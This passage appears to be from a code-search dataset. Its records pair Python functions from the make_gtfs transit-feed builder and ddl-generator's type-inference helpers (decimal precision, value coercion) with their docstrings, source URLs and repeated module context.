duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g | Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L268-L384 | [
"def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):\n \"\"\"\n Given a GeoDataFrame of stops, a Shapely LineString in the\n same coordinate system, a side of the LineString\n (string; 'left' = left hand side of LineString,\n 'right' = right hand side of LineString, or\n 'both' = ... | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_stops(pfeed, shapes=None):
"""
Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops.
"""
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def buffer_side(linestring, side, buffer):
"""
Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon.
"""
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
"""
Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString.
"""
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy()
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | precision_and_scale | python | def precision_and_scale(x):
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale) | From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L17-L47 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | coerce_to_specific | python | def coerce_to_specific(datum):
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum) | Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10 | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L51-L112 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | _places_b4_and_after_decimal | python | def _places_b4_and_after_decimal(d):
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0)) | >>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3) | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L114-L120 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
